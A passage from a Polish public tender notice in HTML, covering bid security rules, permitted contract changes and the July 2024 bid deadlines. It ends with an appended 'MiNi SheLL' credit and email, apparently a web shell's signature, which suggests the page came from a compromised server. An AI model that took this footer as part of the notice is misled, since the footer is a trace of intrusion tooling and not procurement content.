składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas gdy przed upływem terminu składania ofert kwota wniesionego wadium będzie uznana na rachunku bankowym zamawiającego.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a) przelewem na rachunek bankowy zamawiającego: 44 1020 2746 0000 3902 0019 9083<br/>b) gwarancjach bankowych<br/>c) gwarancjach ubezpieczeniowych<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości&#34; - tu należy zwrócić uwagę na formatowanie domyślnej treści, dodatkowo w miejscu kropek w treści domyślnej powinien się znaleźć numer konta bankowego zamawiającego.<br/>3. Wadium wnoszone w innej niż pieniądz formie musi posiadać ważność nieprzerwanie do dnia upływu terminu związania ofertą.<br/>4. W przypadku wniesienia wadium w innej formie niż pieniądz należy wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>a) upływu terminu związania ofertą<br/>b) zawarcia umowy w sprawie zamówienia publicznego<br/>c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>6. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>a) który wycofał ofertę przed upływem terminu składania ofert<br/>b) którego oferta została odrzucona<br/>c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza<br/>d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>a) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej<br/>b) wykonawca, którego oferta została wybrana:<br/>•	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>•	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy<br/>c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana.<br/>8. Złożenie wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej.<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>10. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmianę postanowień niniejszej umowy w przypadku:<br/>1) siły wyższej, w wyniku, której nie jest możliwe zachowanie przez Wykonawcę określonego umową terminu realizacja<br/>zamówienia publicznego; przez wystąpienie okoliczności siły wyższej, należy rozumieć zdarzenia niezależne od żadnej ze<br/>Stron, zewnętrzne, niemożliwe do zapobiegania, które nastąpiło po dniu wejścia w życie Umowy, w szczególności: wojny,<br/>akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu<br/>zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej.<br/>2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;<br/>3) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową,<br/>zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w<br/>chwili zawarcia umowy - zmianie może ulec termin realizacji umowy lub zakres zamówienia;<br/>4) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna, lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia -Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia lub zakresu zamówienia.<br/>5) zmiana podwykonawcy, przy pomocy, którego Wykonawca wykonuje przedmiot umowy;<br/>6) gdy zmiany te są korzystne dla Zamawiającego bez zwiększenia ustalonego wynagrodzenia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-10 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-10 15:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com